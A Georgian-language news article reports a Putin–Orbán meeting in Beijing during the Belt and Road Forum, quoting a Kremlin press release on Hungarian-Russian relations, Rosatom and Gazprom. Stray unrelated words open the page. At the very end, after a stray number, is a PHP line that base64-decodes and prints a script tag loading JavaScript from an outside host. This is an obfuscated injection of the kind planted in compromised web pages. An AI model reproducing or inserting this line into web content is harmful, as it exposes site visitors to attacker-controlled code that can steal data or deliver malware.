celsiusi
ავერსი შნაიდერი
 პეკინში რუსეთის პრეზიდენტ ვლადიმერ პუტინსა და უნგრეთის პრემიერ-მინისტრ ვიქტორ ორბანს შორის შეხვედრა გაიმართა. უნგრეთისა და რუსეთის ლიდერები ჩინეთში „სარტყელისა და გზის ფორუმის“ ფარგლებში იმყოფებიან.

ორბანისა და პუტინის ორმხრივი შეხვედრის შესახებ ინფორმაციას და მათ მიერ გაკეთებულ კომენტარებს კრემლი ავრცელებს.

„იმის მიუხედავად, რომ დღევანდელ გეოპოლიტიკურ პირობებში კონტაქტების შენარჩუნებისა და ურთიერთობების განვითარების შესაძლებლობები ძალიან შეზღუდულია, კმაყოფილებას იწვევს, რომ ევროპის მრავალ ქვეყანასთან ჩვენი ურთიერთობები შენარჩუნებულია და ვითარდება. ერთ-ერთი ასეთი ქვეყანა უნგრეთია“, – განაცხადა პუტინმა.

თავის მხრივ, ორბანმა განაცხადა, რომ „უნგრეთს არასდროს სურდა რუსეთთან დაპირისპირება“.

„პირიქით, უნგრეთის მიზანი ყოველთვის იყო საუკეთესო კონტაქტების დამყარება, ურთიერთგაფართოება და ჩვენ ეს შევძელით“, – განაცხადა ორბანმა, კრემლის მიერ გამოქვეყნებული პრესრელიზის თანახმად.

პრესრელიზის მიხედვით, ვიქტორ ორბანმა ასევე აღნიშნა, რომ უნგრეთი ცდილობს, გადაარჩინოს ყველაფერი, რაც შესაძლებელია ორმხრივი კონტაქტებიდან. კრემლის ცნობით, მან აგრეთვე მადლობა გადაუხადა პუტინს იმისთვის, რომ „როსატომი“ უნგრეთის პარტნიორად რჩება, „გაზპრომი“ კი შეთანხმებით გათვალისწინებულ ვალდებულებებს ასრულებს.

„ჩვენ შევძელით აქამდე მიღწეულიდან ძალიან ბევრი რამის გადარჩენა. არავის უყვარს, როდესაც მისი მუშაობის შედეგები ნულდება ისეთი მიზეზებით, რომელშიც ის არანაირად არ არის დამნაშავე“, – აღნიშნა ორბანმა.

290
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");